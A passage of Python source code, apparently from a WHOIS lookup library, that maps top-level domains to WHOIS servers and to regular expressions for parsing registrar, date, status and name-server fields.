\"updated_date\": R(r\"Last updated:\\s*(.+)\"),\n \"name_servers\": R(r\"Name servers:%s\\n\\n\" % xStr(r\"(?:\\n[ \\t]+(\\S+).*)?\", 10)), # capture up to 10\n \"status\": R(r\"Registration status:\\n\\s*(.+)\"),\n}\n\nZZ[\"uz\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"name_servers\": R(r\"Domain servers in listed order:%s\\n\\n\" % xStr(r\"(?:\\n\\s+(\\S+))?\", 4)),\n # sometimes 'not.defined is returned as a nameserver (e.g. google.uz)\n}\n\nZZ[\"wiki\"] = {\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n}\n\nZZ[\"work\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.work\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"_test\": \"nic.work\",\n}\n\nZZ[\"ac\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Domain Status:\\s(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s*(.*)\\r?\\n\"),\n \"updated_date\": R(r\"Updated Date:\\s+(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s+(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s+(.+)\"),\n \"registrant\": R(r\"Registrant Organization:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"ae\"] = {\n \"extend\": \"ar\",\n \"_server\": \"whois.aeda.net.ae\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar Name:\\s+(.+)\"),\n \"status\": R(r\"Status:\\s(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\"),\n \"registrant_country\": None,\n \"creation_date\": None,\n \"expiration_date\": None,\n \"updated_date\": None,\n \"_test\": \"net.ae\",\n}\n\nZZ[\"bg\"] = {\n \"_server\": \"whois.register.bg\",\n \"domain_name\": R(r\"DOMAIN\\s+NAME:\\s+(.+)\"),\n \"status\": R(r\"registration\\s+status:\\s(.+)\"),\n \"name_servers\": R(r\"NAME SERVER INFORMATION:\\n%s\" % xStr(r\"(?:(.+)\\n)?\", 4)),\n \"creation_date\": None,\n \"expiration_date\": None,\n \"updated_date\": None,\n \"registrar\": None,\n \"registrant_country\": None,\n \"_test\": \"register.bg\",\n}\n\nZZ[\"bj\"] = {\n \"_server\": \"whois.nic.bj\",\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(\\S+)\\n\"),\n \"_test\": \"nic.bj\",\n}\n\nZZ[\"cf\"] = {\n \"domain_name\": None,\n \"name_servers\": R(r\"Domain Nameservers:\\n(?:(.+)\\n)(?:(.+)\\n)?(?:(.+)\\n)?(?:(.+)\\n)?\"),\n \"registrar\": R(r\"Record maintained by:\\s+(.+)\"),\n \"creation_date\": R(r\"Domain registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"Record will expire:\\s?(.+)\"),\n \"updated_date\": None,\n \"registrant_country\": None,\n # very restrictive, after a few queries it will refuse with try again later\n \"_slowdown\": 5,\n}\n\nZZ[\"re\"] = {\n \"extend\": \"ac\",\n \"domain_name\": R(r\"domain:\\s+(.+)\"),\n \"registrar\": R(r\"registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"nserver:\\s+(.+)\"),\n \"status\": R(r\"status:\\s(.+)\"),\n \"creation_date\": R(r\"created:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s+(.+)\"),\n \"updated_date\": R(r\"last-update:\\s+(.*)\"),\n \"registrant_country\": None,\n}\n\nZZ[\"ro\"] = {\n \"domain_name\": R(r\"\\s+Domain name:\\s+(.+)\"),\n \"registrar\": R(r\"\\s+Registrar:\\s+(.+)\"),\n \"creation_date\": R(r\"\\s+Registered On:\\s+(.+)\"),\n \"expiration_date\": R(r\"\\s+Expires On:\\s+(.+)\"),\n \"status\": R(r\"\\s+Domain Status:\\s(.+)\"),\n \"name_servers\": R(r\"\\s+NameServer:\\s+(.+)\"),\n \"registrant_country\": None,\n \"updated_date\": None,\n}\n\nZZ[\"rs\"] = {\n \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Domain status:\\s(.+)\"),\n \"creation_date\": R(r\"Registration date:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expiration date:\\s+(.+)\"),\n \"updated_date\": R(r\"Modification date:\\s+(.+)\"),\n \"name_servers\": R(r\"DNS:\\s+(.+)\"),\n \"registrant_country\": None,\n \"registrant\": R(r\"Registrant:\\s*([^\\n]*)\\n\"),\n}\n\n# Singapore\nZZ[\"sg\"] = {\n \"_server\": \"whois.sgnic.sg\",\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"domain_name\": R(r\"\\s+Domain name:\\s+(.+)\"),\n \"creation_date\": R(r\"\\s+Creation Date:\\s+(.+)\"),\n \"expiration_date\": R(r\"\\s+Expiration Date:\\s+(.+)\"),\n \"updated_date\": R(r\"\\s+Modified Date:\\s+(.+)\"),\n \"status\": R(r\"\\s+Domain Status:\\s(.+)\"),\n \"registrant_country\": None,\n \"name_servers\": R(r\"Name Servers:%s\" % xStr(r\"(?:\\n[ \\t]+(\\S+)[^\\n]*)?\", 4)),\n # make sure the dnssec is not matched\n \"_test\": \"sgnic.sg\",\n}\n\nZZ[\"tw\"] = {\n \"_server\": \"whois.twnic.net.tw\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"creation_date\": R(r\"\\s+Record created on\\s+(.+)\"),\n \"expiration_date\": R(r\"\\s+Record expires on\\s+(.+)\"),\n \"status\": R(r\"\\s+Domain Status:\\s+(.+)\"),\n \"registrar\": R(r\"Registration\\s+Service\\s+Provider:\\s+(.+)\"),\n \"updated_date\": None,\n \"registrant_country\": None,\n \"name_servers\": R(r\"Domain servers in listed order:%s\" % xStr(r\"(?:\\s+(\\S+)[ \\t]*\\r?\\n)?\", 4)),\n \"_test\": \"net.tw\",\n \"registrant\": R(r\"\\n\\s*Registrant:[\\s\\n]*([^\\n]*)\\n*\"),\n}\n\nZZ[\"ug\"] = {\n \"_server\": \"whois.co.ug\",\n \"domain_name\": R(r\"Domain name:\\s+(.+)\"),\n \"creation_date\": R(r\"Registered On:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expires On:\\s+(.+)\"),\n \"status\": R(r\"Status:\\s+(.+)\"),\n \"name_servers\": R(r\"Nameserver:\\s+(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\"),\n \"updated_date\": R(r\"Renewed On:\\s+(.+)\"),\n \"registrar\": None,\n \"registrant\": R(r\"Registrant Organization:\\s*([^\\n]*)\\n\"),\n \"_test\": \"nic.co.ug\",\n}\n\nZZ[\"ws\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s+(.+)\"),\n \"expiration_date\": R(r\"Registrar Registration Expiration Date:\\s+(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s?(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"status\": R(r\"Domain Status:\\s(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(.+)\"),\n \"registrant_country\": None,\n \"_server\": \"whois.website.ws\",\n \"_test\": \"website.ws\",\n}\n\nZZ[\"re\"] = {\n \"domain_name\": R(r\"domain:\\s+(.+)\"),\n \"status\": R(r\"status:\\s+(.+)\"),\n \"registrar\": R(r\"registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"nserver:\\s+(.+)\"),\n \"creation_date\": R(r\"created:\\s+(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s+(.+)\"),\n \"updated_date\": R(r\"last-update:\\s+(.+)\"),\n \"registrant_country\": None,\n}\n\nZZ[\"bo\"] = {\n \"domain_name\": R(r\"\\s*NOMBRE DE DOMINIO:\\s+(.+)\"),\n \"registrant_country\": R(r\"País:\\s+(.+)\"),\n \"creation_date\": R(r\"Fecha de activación:\\s+(.+)\"),\n \"expiration_date\": R(r\"Fecha de corte:\\s+(.+)\"),\n \"registrar\": None,\n \"status\": None,\n \"name_servers\": None, # bo has no nameservers, use host -t ns \n \"updated_date\": None,\n \"registrant\": R(r\"CONTACTO ADMINISTRATIVO\\nRazón social:\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"hr\"] = {\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s+(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s+(.+)\"),\n \"updated_date\": R(r\"Updated Date:\\s+(.+)\"),\n \"status\": None,\n \"registrar\": R(r\"Registrar:\\s*([^\\n]*)\\n\"),\n \"expiration_date\": R(r\"Registrar Registration Expiration Date:\\s+(.+)\"),\n \"registrant_country\": R(r\"Registrant State/Province:\\s*([^\\n]*)\\n\"),\n \"registrant\": R(r\"Registrant Name:\\s*([^\\n]*)\\n\"),\n \"_test\": \"google.hr\",\n}\n\nZZ[\"gg\"] = {\n \"domain_name\": R(r\"Domain:\\s*\\n\\s+(.+)\"),\n \"status\": R(r\"Domain Status:\\s*\\n\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s*\\n\\s+(.+)\"),\n \"name_servers\": R(r\"Name servers:(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?(?:\\n\\s+(\\S+))?\\n\"),\n \"creation_date\": R(r\"Relevant dates:\\s*\\n\\s+Registered on(.+)\"),\n \"expiration_date\": None,\n \"updated_date\": None,\n \"registrant_country\": None,\n \"registrant\": R(r\"\\nregistrant:\\s*\\n\\s*([^\\n]*)\\n\"),\n}\n\nZZ[\"sn\"] = {\n \"_server\": \"whois.nic.sn\",\n \"domain_name\": R(r\"Nom de domaine:\\s+(.+)\"),\n \"status\": R(r\"Statut:\\s+(.+)\"),\n \"registrar\": R(r\"Registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"Serveur de noms:\\s*(.+)\"),\n \"creation_date\": R(r\"Date de création:\\s+(.+)\"),\n \"expiration_date\": R(r\"Date d'expiration:\\s+(.+)\"),\n \"updated_date\": R(r\"Dernière modification:\\s+(.+)\"),\n \"_test\": \"nic.sn\",\n \"registrant\": findFromToAndLookFor(\n fromStr=r\"\\n\\[HOLDER\\]\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Nom:\\s*([^\\n]*)\\n\",\n ),\n \"registrant_country\": findFromToAndLookFor(\n fromStr=r\"\\n\\[HOLDER\\]\",\n toStr=r\"\\n\\n\",\n lookForStr=r\"Pays:\\s*([^\\n]*)\\n\",\n ),\n}\n\nZZ[\"si\"] = {\n \"_server\": \"whois.register.si\",\n \"domain_name\": R(r\"domain:\\s+(.+)\"),\n \"status\": R(r\"status:\\s+(.+)\"),\n \"registrar\": R(r\"registrar:\\s+(.+)\"),\n \"name_servers\": R(r\"nameserver:\\s*(.+)\"),\n \"creation_date\": R(r\"created:\\s+(.+)\"),\n \"expiration_date\": R(r\"expire:\\s+(.+)\"),\n \"updated_date\": None,\n \"registrant_country\": None,\n \"_test\": \"register.si\",\n}\n\nZZ[\"st\"] = {\n # .ST domains can now be registered with many different competing registrars. and hence different formats\n # >>> line appears quite early, valid info after would have been suppressed with the ^>>> cleanup rule: switched off\n \"extend\": \"com\",\n \"registrant_country\": R(r\"registrant-country:\\s+(\\S+)\"),\n \"registrant\": R(r\"registrant-organi(?:s|z)ation:\\s*(.+)\\r?\\n\"),\n \"expiration_date\": R(r\"Expiration\\s+Date:\\s?(.+)\"),\n}\n\nZZ[\"mk\"] = {\n \"_server\": \"whois.marnet.mk\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"registered:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": R(r\"[\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4}\"),\n \"_test\": \"marnet.mk\",\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"contact:\\s*{}\\n\",\n extract=r\"org:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n}\n\nZZ[\"si\"] = {\n \"_server\": \"whois.register.si\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed:\\s?(.+)\"),\n \"name_servers\": R(r\"nameserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"Status:\\s?(.+)\"),\n \"emails\": R(r\"[\\w\\.-]+@[\\w\\.-]+\\.[\\w]{2,4}\"),\n \"_test\": \"register.si\",\n}\n\nZZ[\"tc\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.tc\",\n \"domain_name\": R(r\"Domain Name:\\s?(.+)\"),\n \"registrar\": R(r\"Sponsoring Registrar:\\s?(.+)\"),\n \"creation_date\": R(r\"Creation Date:\\s?(.+)\"),\n \"expiration_date\": R(r\"Registry Expiry Date:\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server:\\s*(.+)\\s*\"),\n \"status\": R(r\"Domain Status:\\s?(.+)\"),\n \"_test\": \"nic.tc\",\n}\n\nZZ[\"wf\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.wf\",\n \"domain_name\": R(r\"domain:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"registrant_country\": R(r\"Registrant Country:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiry Date:\\s?(.+)\"),\n \"updated_date\": R(r\"last-update:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"\\nstatus:\\s?(.+)\"),\n \"_test\": \"nic.wf\",\n}\n\nZZ[\"mo\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.monic.mo\",\n \"name_servers\": R(r\"Domain name servers:\\s+-+\\s+(\\S+)\\n(?:(\\S+)\\n)?(?:(\\S+)\\n)?(?:(\\S+)\\n)?\"),\n \"creation_date\": R(r\"Record created on (.+)\"),\n \"expiration_date\": R(r\"Record expires on (.+)\"),\n \"_test\": \"monic.mo\",\n}\n\nZZ[\"tm\"] = { # Turkmenistan\n \"extend\": \"com\",\n \"domain_name\": R(r\"Domain\\s*:\\s*(.+)\"),\n \"expiration_date\": R(r\"Expiry\\s*:\\s*(\\d+-\\d+-\\d+)\"),\n \"name_servers\": R(r\"NS\\s+\\d+\\s+:\\s*(\\S+)\"),\n \"status\": R(r\"Status\\s*:\\s*(.+)\"),\n}\n\n# venezuela\nZZ[\"ve\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.ve\",\n \"domain_name\": R(r\"domain\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\s?(.+)\"),\n # \"registrant\": R(r\"registrant:\\s?(.+)\"),\n \"creation_date\": R(r\"created:\\s?(.+)\"),\n \"expiration_date\": R(r\"expire:\\s?(.+)\"),\n \"updated_date\": R(r\"changed\\s*:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"_test\": \"nic.ve\",\n \"registrant\": findInSplitedLookForHavingFindFirst(\n findFirst=r\"registrant:\\s?(.+)\",\n lookForStr=r\"contact:\\s*{}\\n\",\n extract=r\"org:\\s*([^\\n]*)\\n\",\n ),\n \"_split\": newLineSplit(),\n}\n\nZZ[\"lu\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.dns.lu\",\n \"domain_name\": R(r\"domainname\\s*:\\s?(.+)\"),\n \"registrar\": R(r\"registrar-name:\\s?(.+)\"),\n \"name_servers\": R(r\"nserver:\\s*(.+)\\s*\"),\n \"status\": R(r\"domaintype\\s*:\\s*(.+)\"),\n \"registrant_country\": R(r\"org-country\\s*:\\s?(.+)\"),\n \"_test\": \"dns.lu\",\n}\n\nZZ[\"sm\"] = {\n \"extend\": \"rs\",\n \"_server\": \"whois.nic.sm\",\n \"domain_name\": R(r\"Domain Name:\\s+(.+)\"),\n \"status\": R(r\"Status:\\s(.+)\"),\n \"name_servers\": R(r\"DNS Servers:\\s+(.+)\"),\n \"_test\": \"nic.sm\",\n}\n\nZZ[\"tg\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.tg\",\n \"domain_name\": R(r\"domain:\\.+\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\.+\\s?(.+)\"),\n \"creation_date\": R(r\"Activation:\\.+\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration:\\.+\\s?(.+)\"),\n \"status\": R(r\"Status:\\.+\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server \\(DB\\):\\.+(.+)\"),\n \"_test\": \"nic.tg\",\n}\n\nZZ[\"md\"] = {\n \"extend\": \"com\",\n \"_server\": \"whois.nic.md\",\n \"domain_name\": R(r\"domain\\s+name:\\s?(.+)\"),\n \"status\": R(r\"domain\\s+state:\\s?(.+)\"),\n \"name_servers\": R(r\"Nameserver:(.+)\"),\n \"registrar\": R(r\"Registrar:\\s?(.+)\"),\n \"creation_date\": R(r\"Registered\\s+on:\\s?(.+)\"),\n \"expiration_date\": R(r\"Expires\\s+on:\\s?(.+)\"),\n \"_test\": \"nic.md\",\n}\n\nZZ[\"tg\"] = {\n \"_server\": \"whois.nic.tg\",\n \"extend\": \"com\",\n \"_test\": \"nic.tg\",\n \"domain_name\": R(r\"domain:\\.+\\s?(.+)\"),\n \"registrar\": R(r\"registrar:\\.+\\s?(.+)\"),\n \"creation_date\": R(r\"Activation:\\.+\\s?(.+)\"),\n \"expiration_date\": R(r\"Expiration:\\.+\\s?(.+)\"),\n \"status\": R(r\"Status:\\.+\\s?(.+)\"),\n \"name_servers\": R(r\"Name Server \\(DB\\):\\.+(.+)\"),\n}\nZZ[\"au\"] = {\n \"extend\": \"com\",\n \"registrar\": R(r\"Registrar Name:\\s?(.+)\"),\n \"updated_date\": R(r\"Last Modified:([^\\n]*)\"),\n \"registrant\": r\"Registrant:\\s*([^\\n]*)\\n\",\n}\n\n# ======================================\n# ======================================\n# ======================================\n\nZZ[\"aarp\"] = {\"_server\": \"whois.nic.aarp\", \"extend\": \"com\", \"_test\": \"nic.aarp\"}\nZZ[\"abbott\"] = {\"_server\": \"whois.nic.abbott\", \"extend\": \"com\", \"_test\": \"nic.abbott\"}\nZZ[\"abbvie\"] = {\"_server\": \"whois.nic.abbvie\", \"extend\": \"com\", \"_test\": \"nic.abbvie\"}\nZZ[\"abc\"] = {\"_server\": \"whois.nic.abc\", \"extend\": \"com\", \"_test\": \"nic.abc\"}\nZZ[\"abogado\"] = {\"_server\": \"whois.nic.abogado\", \"extend\": \"com\", \"_test\": \"nic.abogado\"}\nZZ[\"abudhabi\"] = {\"_server\": \"whois.nic.abudhabi\", \"extend\": \"com\", \"_test\": \"nic.abudhabi\"}\nZZ[\"academy\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ac.bd\"] = {\"extend\": \"bd\"}\nZZ[\"accountant\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.accountant\", \"_test\": \"nic.accountant\"}\nZZ[\"accountants\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ac.jp\"] = {\"extend\": \"co.jp\", \"_test\": \"icu.ac.jp\"}\nZZ[\"ac.ke\"] = {\"extend\": \"ke\"}\nZZ[\"aco\"] = {\"_server\": \"whois.nic.aco\", \"extend\": \"com\", \"_test\": \"nic.aco\"}\nZZ[\"ac.rw\"] = {\"extend\": \"rw\"}\nZZ[\"ac.th\"] = {\"extend\": \"co.th\", \"_test\": \"chula.ac.th\"}\nZZ[\"actor\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ac.ug\"] = {\"extend\": \"ug\", \"_privateRegistry\": True}\nZZ[\"ad.jp\"] = {\"extend\": \"co.jp\", \"_test\": \"nic.ad.jp\"}\nZZ[\"ads\"] = {\"_server\": \"whois.nic.ads\", \"extend\": \"com\", \"_test\": \"nic.ads\"}\nZZ[\"adult\"] = {\"_server\": \"whois.nic.adult\", \"extend\": \"com\", \"_test\": \"nic.adult\"}\nZZ[\"aeg\"] = {\"_server\": \"whois.nic.aeg\", \"extend\": \"com\", \"_test\": \"nic.aeg\"}\nZZ[\"aero\"] = {\"extend\": \"ac\", \"_server\": \"whois.aero\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\")}\nZZ[\"af\"] = {\"extend\": \"ac\"}\nZZ[\"com.af\"] = {\"extend\": \"af\"}\nZZ[\"afl\"] = {\"_server\": \"whois.nic.afl\", \"extend\": \"com\", \"_test\": \"nic.afl\"}\nZZ[\"africa\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.africa\", \"_test\": \"nic.africa\"}\nZZ[\"agakhan\"] = {\"_server\": \"whois.nic.agakhan\", \"extend\": \"com\", \"_test\": \"nic.agakhan\"}\nZZ[\"agency\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ag\"] = {\"extend\": \"ac\"}\nZZ[\"com.ag\"] = {\"extend\": \"ac\"}\n\nZZ[\"ai\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.ai\"} # Anguill, \"_test\": \"nic.ai\"}\nZZ[\"airbus\"] = {\"_server\": \"whois.nic.airbus\", \"extend\": \"com\", \"_test\": \"nic.airbus\"}\nZZ[\"airforce\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"airtel\"] = {\"_server\": \"whois.nic.airtel\", \"extend\": \"com\", \"_test\": \"nic.airtel\"}\nZZ[\"akdn\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\", \"_test\": \"nic.akdn\"}\nZZ[\"al\"] = {\"extend\": \"_privateReg\"}\nZZ[\"alibaba\"] = {\"_server\": \"whois.nic.alibaba\", \"extend\": \"com\", \"_test\": \"nic.alibaba\"}\nZZ[\"alipay\"] = {\"_server\": \"whois.nic.alipay\", \"extend\": \"com\", \"_test\": \"nic.alipay\"}\nZZ[\"allfinanz\"] = {\"_server\": \"whois.nic.allfinanz\", \"extend\": \"com\", \"_test\": \"nic.allfinanz\"}\nZZ[\"allstate\"] = {\"_server\": \"whois.nic.allstate\", \"extend\": \"com\", \"_test\": \"nic.allstate\"}\nZZ[\"ally\"] = {\"_server\": \"whois.nic.ally\", \"extend\": \"com\", \"_test\": \"nic.ally\"}\nZZ[\"alsace\"] = {\"_server\": \"whois.nic.alsace\", \"extend\": \"com\", \"_test\": \"nic.alsace\"}\nZZ[\"alstom\"] = {\"_server\": \"whois.nic.alstom\", \"extend\": \"com\", \"_test\": \"nic.alstom\"}\nZZ[\"amazon\"] = {\"_server\": \"whois.nic.amazon\", \"extend\": \"com\", \"_test\": \"nic.amazon\"}\nZZ[\"americanfamily\"] = {\"_server\": \"whois.nic.americanfamily\", \"extend\": \"com\", \"_test\": \"nic.americanfamily\"}\nZZ[\"amfam\"] = {\"_server\": \"whois.nic.amfam\", \"extend\": \"com\", \"_test\": \"nic.amfam\"}\nZZ[\"android\"] = {\"_server\": \"whois.nic.android\", \"extend\": \"com\", \"_test\": \"nic.android\"}\nZZ[\"anquan\"] = {\"extend\": \"_teleinfo\", \"_server\": \"whois.teleinfo.cn\"}\nZZ[\"anz\"] = {\"_server\": \"whois.nic.anz\", \"extend\": \"com\", \"_test\": \"nic.anz\"}\nZZ[\"aol\"] = {\"_server\": \"whois.nic.aol\", \"extend\": \"com\", \"_test\": \"nic.aol\"}\nZZ[\"apartments\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"app\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"apple\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"aquarelle\"] = {\"_server\": \"whois.nic.aquarelle\", \"extend\": \"com\", \"_test\": \"nic.aquarelle\"}\nZZ[\"arab\"] = {\"_server\": \"whois.nic.arab\", \"extend\": \"com\", \"_test\": \"nic.arab\"}\nZZ[\"archi\"] = {\"_server\": \"whois.nic.archi\", \"extend\": \"com\", \"_test\": \"nic.archi\"}\nZZ[\"army\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"arte\"] = {\"_server\": \"whois.nic.arte\", \"extend\": \"com\", \"_test\": \"nic.arte\"}\nZZ[\"art\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"asda\"] = {\"_server\": \"whois.nic.asda\", \"extend\": \"com\", \"_test\": \"nic.asda\"}\nZZ[\"as\"] = {\"extend\": \"gg\"}\nZZ[\"asia\"] = {\"extend\": \"com\"}\nZZ[\"associates\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"attorney\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"auction\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"audible\"] = {\"_server\": \"whois.nic.audible\", \"extend\": \"com\", \"_test\": \"nic.audible\"}\nZZ[\"audio\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"audi\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"auspost\"] = {\"_server\": \"whois.nic.auspost\", \"extend\": \"com\", \"_test\": \"nic.auspost\"}\nZZ[\"author\"] = {\"_server\": \"whois.nic.author\", \"extend\": \"com\", \"_test\": \"nic.author\"}\nZZ[\"auto\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"autos\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"avianca\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"aw\"] = {\"extend\": \"nl\", \"name_servers\": R(r\"Domain nameservers.*:\\n%s\" % xStr(r\"(?:\\s+(\\S+)\\n)?\", 4))}\nZZ[\"aws\"] = {\"_server\": \"whois.nic.aws\", \"extend\": \"com\", \"_test\": \"nic.aws\"}\nZZ[\"az\"] = {\"extend\": \"_privateReg\"}\nZZ[\"baby\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ba\"] = {\"extend\": \"_privateReg\"}\nZZ[\"baidu\"] = {\"_server\": \"whois.gtld.knet.cn\", \"extend\": \"com\", \"_test\": \"nic.baidu\"}\nZZ[\"band\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"barcelona\"] = {\"_server\": \"whois.nic.barcelona\", \"extend\": \"com\", \"_test\": \"nic.barcelona\"}\nZZ[\"barclaycard\"] = {\"_server\": \"whois.nic.barclaycard\", \"extend\": \"com\", \"_test\": \"nic.barclaycard\"}\nZZ[\"barclays\"] = {\"_server\": \"whois.nic.barclays\", \"extend\": \"com\", \"_test\": \"nic.barclays\"}\nZZ[\"barefoot\"] = {\"_server\": \"whois.nic.barefoot\", \"extend\": \"com\", \"_test\": \"nic.barefoot\"}\nZZ[\"bar\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"bargains\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"basketball\"] = {\"_server\": \"whois.nic.basketball\", \"extend\": \"com\", \"_test\": 